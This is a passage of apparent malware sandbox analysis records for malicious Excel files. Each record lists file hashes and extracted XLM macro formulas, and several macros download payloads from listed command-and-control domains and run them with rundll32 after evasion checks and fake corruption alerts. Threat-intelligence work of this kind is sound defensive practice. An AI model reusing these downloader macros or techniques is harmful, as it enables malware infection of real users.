255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WnTP4ynk2Y\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d431b67980a9f167d6a3d5d07f21adc65dd1111ef286857d942aa27aa4af966"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d431b67980a9f167d6a3d5d07f21adc65dd1111ef286857d942aa27aa4af966","filesize":104448,"md5":"6e54d0d6d2e80e883b353842de3abd98","sha1":"07a466ad3e82ed8806e17acef42bf667c9c0684d","sha256":"4d431b67980a9f167d6a3d5d07f21adc65dd1111ef286857d942aa27aa4af966","sha512":"8fe0b7c3cca99f441c2b6c6335a581f21a66a0d0d49ba005879ab5cee94b36fe759b35c6a602deb8c6dabd765daf7241e12da6b98c13b32a8892cef48f5379a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d431b67980a9f167d6a3d5d07f21adc65dd1111ef286857d942aa27aa4af966.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ePI83DifCq\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d461462527cf4d051c847bcc8b43c4942f39f6c04d72d604c06643dd5069d62"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d461462527cf4d051c847bcc8b43c4942f39f6c04d72d604c06643dd5069d62","filesize":144384,"md5":"2b713c371c8589c3e1ab2a1c766de1ba","sha1":"a8d2604a142caadf184c8a7cb3b3816c1b31fe36","sha256":"4d461462527cf4d051c847bcc8b43c4942f39f6c04d72d604c06643dd5069d62","sha512":"cfde09a40ae0ec37491294a5fe1f222066c0cb090bb18da1f62c66e1d28db4c6a0acd6664e6e11c71ae962d529f2bd4d87cf69b0a46eb7a95cfd60553142807c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d461462527cf4d051c847bcc8b43c4942f39f6c04d72d604c06643dd5069d62.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"GKzY22geqr\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d51737a88840bc437c2bbf06ebae77c2f94f18e6025e874850e361fb7d42805"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d51737a88840bc437c2bbf06ebae77c2f94f18e6025e874850e361fb7d42805","filesize":185344,"md5":"22cdb04c3e0ae3a969737afbcd9908a5","sha1":"edbaf1291b6c48719c03297eb63a66f363de3f25","sha256":"4d51737a88840bc437c2bbf06ebae77c2f94f18e6025e874850e361fb7d42805","sha512":"11315c4036aac1fc438d02ef3fa778af55dac5b0dc2234995b6d95b4007f5f3d356079ab95ac5c9c093353f2b7c626a379a2ef9bbe23a0ebaffb17f07601b5ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d51737a88840bc437c2bbf06ebae77c2f94f18e6025e874850e361fb7d42805.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d532be07e26944152ec72acfba7745d8ee6d9660ff1a93e682ed5840d74b462"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d532be07e26944152ec72acfba7745d8ee6d9660ff1a93e682ed5840d74b462","filesize":226304,"md5":"537055718e52b6ed6652c2617d6eae20","sha1":"acb866948587330d722cdce56473342de6de46c8","sha256":"4d532be07e26944152ec72acfba7745d8ee6d9660ff1a93e682ed5840d74b462","sha512":"861034e64448621bdd220d3a7a2c6f7206331bd24f96cfa4cda21dca54fb8ee14667a928ca08754587665327d8664b929bd0b6afc02fdb75ff7021b04d9d4858","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d532be07e26944152ec72acfba7745d8ee6d9660ff1a93e682ed5840d74b462.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IFpwFzhw4T\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d5ea246318f61b946013a25bbb2ba6870006682a1084f1e8566eb2403486fa7"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d5ea246318f61b946013a25bbb2ba6870006682a1084f1e8566eb2403486fa7","filesize":112128,"md5":"59fc00efbedb7d52d62a554320acaa22","sha1":"84018ce8b46172d9130da2625a136f92ab0cf61c","sha256":"4d5ea246318f61b946013a25bbb2ba6870006682a1084f1e8566eb2403486fa7","sha512":"648329edbd2a867be16c146440609bfde7a09097cb95d9be3dd8bc0670ceeb4392598c84de9578a0d2ee2f7f2aa7ef61c27d57b42ef4d108a744ab4275f7e521","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d5ea246318f61b946013a25bbb2ba6870006682a1084f1e8566eb2403486fa7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d7049710b6d89411c82ca626ee153c5326cf7fa2e9bcf44b2ba74d8c19f902f"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d7049710b6d89411c82ca626ee153c5326cf7fa2e9bcf44b2ba74d8c19f902f","filesize":168448,"md5":"6b0949c653664711b5f3ea43a464e62b","sha1":"6a40a92268934d67b42816886885e12933205e05","sha256":"4d7049710b6d89411c82ca626ee153c5326cf7fa2e9bcf44b2ba74d8c19f902f","sha512":"4c070a1a5465be121333783a4048543a7f1f88421ffdaa3d121b2f97c27f9c3c0fcf892e14da7a690a26f635e2f860882b32a1b1611318e19efdc83a9c15df20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d7049710b6d89411c82ca626ee153c5326cf7fa2e9bcf44b2ba74d8c19f902f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l0OXWVRbnl\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d72736ae9823cd68957fea2d69956657330bae865d8d72b59a64d8a70a002d4"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d72736ae9823cd68957fea2d69956657330bae865d8d72b59a64d8a70a002d4","filesize":185344,"md5":"5958b366cd871c62f6148226f73efdca","sha1":"beebe3a34c8e624e805e36e53e49ee6aa6e2c18b","sha256":"4d72736ae9823cd68957fea2d69956657330bae865d8d72b59a64d8a70a002d4","sha512":"b9de33b3de80da4874d603c6fe19d42292d6aa5d08258bb1f3a30611892cd6b5819144f26bc6eb45754e69785a85cd4e70f032d92901501ac7a41d6b3b1d85b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d72736ae9823cd68957fea2d69956657330bae865d8d72b59a64d8a70a002d4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d730ae36bc4a7d0159ff080c1e432a1b0e4908513e7b8c8f5faf8727c7a6921"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d730ae36bc4a7d0159ff080c1e432a1b0e4908513e7b8c8f5faf8727c7a6921","filesize":185344,"md5":"ea2eaf3b15517fb50f90d0e7af69779e","sha1":"cd7ef589332f4cfd3e48fac050e08215161480aa","sha256":"4d730ae36bc4a7d0159ff080c1e432a1b0e4908513e7b8c8f5faf8727c7a6921","sha512":"f480ec9136a9a79d660f2f9c1221b6d45b23ae902e2e0677dccbdf5e4f035c9b3f4b9d85415154433ac1bfacd1d6f650b98cd59fcaf8a6f6586800ce4819408d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d730ae36bc4a7d0159ff080c1e432a1b0e4908513e7b8c8f5faf8727c7a6921.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d7ab5939cfd2654c01b699a28f12494157734f6134df9a104a3d0d891a9f68d"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d7ab5939cfd2654c01b699a28f12494157734f6134df9a104a3d0d891a9f68d","filesize":168960,"md5":"4b165274d58ae1ea11eeb6ff8e674ff2","sha1":"3b044ceb752b798cf6fcb871d0ac67270d8c7049","sha256":"4d7ab5939cfd2654c01b699a28f12494157734f6134df9a104a3d0d891a9f68d","sha512":"0bfbebc147abc800e5661e49a0385627d23bcadbf4dddbd973f1963a824e5905441addcb0891eff59a3a5d57b534e29aed3783940776aade1781cc7a682e34df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d7ab5939cfd2654c01b699a28f12494157734f6134df9a104a3d0d891a9f68d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lXz1ahZVWL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d8992a8e8cf904e83b124bf31000eb649baa574c834d54da0178b3661ff048c"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d8992a8e8cf904e83b124bf31000eb649baa574c834d54da0178b3661ff048c","filesize":170496,"md5":"9d0b716888f9946d5c40485442ed5c8b","sha1":"5596f36f7b17f1cf46f883cfde0369e756716542","sha256":"4d8992a8e8cf904e83b124bf31000eb649baa574c834d54da0178b3661ff048c","sha512":"63e497639bf675dc64d3aeb9a47c3bb3f3f72c7ec3e8a325f82a8befce69469eaf741a6240d6a3f681c7d6278a654aa96859dfd332d664e9da57804bc0e0682f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d8992a8e8cf904e83b124bf31000eb649baa574c834d54da0178b3661ff048c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TYJxtNnE45\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4dab48f6ec8fb7080826e81e54be9e90db53a4b7c697b464ddb8028ac2056cdc"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4dab48f6ec8fb7080826e81e54be9e90db53a4b7c697b464ddb8028ac2056cdc","filesize":112640,"md5":"a11b006e4938ae237192fc905f209ad4","sha1":"85d81246656dcdc84cbc440b4e1239e82626c35f","sha256":"4dab48f6ec8fb7080826e81e54be9e90db53a4b7c697b464ddb8028ac2056cdc","sha512":"8dd5f39877e93375db5290e5126fb4ef2574d1c8561f5113032e0b4243ca44799041e5012bd7bbc9fe5cfd8b29f7b3f8ddd2a86637e9dc85f5a165396ae4cf6c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4dab48f6ec8fb7080826e81e54be9e90db53a4b7c697b464ddb8028ac2056cdc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4daca061a02b132c29553f458cace8a5a73d4374bd72f99d6ee4df0df475754f"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4daca061a02b132c29553f458cace8a5a73d4374bd72f99d6ee4df0df475754f","filesize":170496,"md5":"cfd4d00ce3f3320509c96efb8fedff55","sha1":"cf32bb1aa5dd9916ef262f97473d7c89a04c5912","sha256":"4daca061a02b132c29553f458cace8a5a73d4374bd72f99d6ee4df0df475754f","sha512":"411c9552bbcb8b18ccedf8e5a4224f7caeea66bfbbd2b5319bdc77ae0fb1798d05a7c292deeba54e84aa8f064cf12973c266f546368d39997912d39852b4c320","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4daca061a02b132c29553f458cace8a5a73d4374bd72f99d6ee4df0df475754f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ym1eB4Bkqj\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4db03902919c8a4361832d3d6015f7c0d8853323c983e74d3572ea3d938c69d5"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4db03902919c8a4361832d3d6015f7c0d8853323c983e74d3572ea3d938c69d5","filesize":126464,"md5":"833403be53b71f18e2701940aab36280","sha1":"1eee4792760feddce3176f21a6d95f7292c43e51","sha256":"4db03902919c8a4361832d3d6015f7c0d8853323c983e74d3572ea3d938c69d5","sha512":"761391c51a129b9ce779e53148d124fd83b173130f377192c61d227b3098df9993f9d34ecb6a35ce970a4bdcc8a3a8aa530d1b2543519804dedaae6d2f304dd4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4db03902919c8a4361832d3d6015f7c0d8853323c983e74d3572ea3d938c69d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4dbc829c1ee4019b2a6365dcb55f201bc351bc8811c52a453d16a091468f632b"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4dbc829c1ee4019b2a6365dcb55f201bc351bc8811c52a453d16a091468f632b","filesize":116224,"md5":"dfc8aa49b0eece283c9551be93e278d4","sha1":"e5aedca4f2ca3c7829f92cdd7dfd5d25583daf21","sha256":"4dbc829c1ee4019b2a6365dcb55f201bc351bc8811c52a453d16a091468f632b","sha512":"451fff96e509759e3c9e84303dd6947bfbee6612589f608611a34cc16283cf6efd50ade6b4361a630eb0784d7827a7b83bbc7c09dd8a6f53693deee0c4a026e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4dbc829c1ee4019b2a6365dcb55f201bc351bc8811c52a453d16a091468f632b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6onyWP7BT2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4dc28de5a8036294d89a539ad1e672d1e8631a36bb68a3838980f4350ab76752"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4dc28de5a8036294d89a539ad1e672d1e8631a36bb68a3838980f4350ab76752","filesize":167936,"md5":"1fb29574e8e04090a6c3789c48734b50","sha1":"adfcbfce4a41241e4c4b75ef8656d15f86cd1c14","sha256":"4dc28de5a8036294d89a539ad1e672d1e8631a36bb68a3838980f4350ab76752","sha512":"f000550b082ab0a56a34debd9a4177e76688f72899845e032d2a8c08d4438d60c1136d41c42e2e2ea64fd74c2ffecd88b37467da5ae366b6d15d815ae8a59325","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4dc28de5a8036294d89a539ad1e672d1e8631a36bb68a3838980f4350ab76752.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wwHPx7di8M\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4dc2dd64784c10ea85661207121674c4dabafac86dd487bef72bdc064d483f12"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4dc2dd64784c10ea85661207121674c4dabafac86dd487bef72bdc064d483f12","filesize":112128,"md5":"a82b8a222bebb82c9dce780fc3636c16","sha1":"c285c069a9efd92b191f41664de4c4e146ae4232","sha256":"4dc2dd64784c10ea85661207121674c4dabafac86dd487bef72bdc064d483f12","sha512":"80a8ea311d0b13d7d4b71d2bf46d8f953e8e86d165cda9ebc0a9dfda0f860012bcda1a897c261cfeb753f00924cfe66095699c19b6bd15fffa74de290c0bf24e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4dc2dd64784c10ea85661207121674c4dabafac86dd487bef72bdc064d483f12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4de18a0cdc1241528906da4d97404f542710b9e35424c4a89c443c0e1474c983"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4de18a0cdc1241528906da4d97404f542710b9e35424c4a89c443c0e1474c983","filesize":141312,"md5":"fd501ef87664b00dc45b70f10fe21366","sha1":"56591fc6ef69387d80017e47a4f748b7838ff404","sha256":"4de18a0cdc1241528906da4d97404f542710b9e35424c4a89c443c0e1474c983","sha512":"19923bcaf976a27364088c1cd67ffbc99cce1f6820988fc2f017e80df9dc374583ee18a5709f3951d3a2a468e2f2907df110ff9dc84f56ecde21aff02bee8e5f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4de18a0cdc1241528906da4d97404f542710b9e35424c4a89c443c0e1474c983.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"TvJelmMRbB\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4de3928e3c548d26cbcb33ecd5ff92f485eff3a809eda748c789ca5df7007f3e"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4de3928e3c548d26cbcb33ecd5ff92f485eff3a809eda748c789ca5df7007f3e","filesize":167936,"md5":"608ed8ce760c7b3920864387f298ca22","sha1":"87b31617d724eabafeefbde28bcf4c80066e174f","sha256":"4de3928e3c548d26cbcb33ecd5ff92f485eff3a809eda748c789ca5df7007f3e","sha512":"bc6c1d36ed438891d54835879e91a106da017c2a886ac7bbdc24ddd72d174bb50900f42dcad7e9d43c4efac403b4f3e4fbf4311be0ba12584ae3e18d5bee91ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4de3928e3c548d26cbcb33ecd5ff92f485eff3a809eda748c789ca5df7007f3e.xls"}],"unpack_count":0,"error_count":0,"extr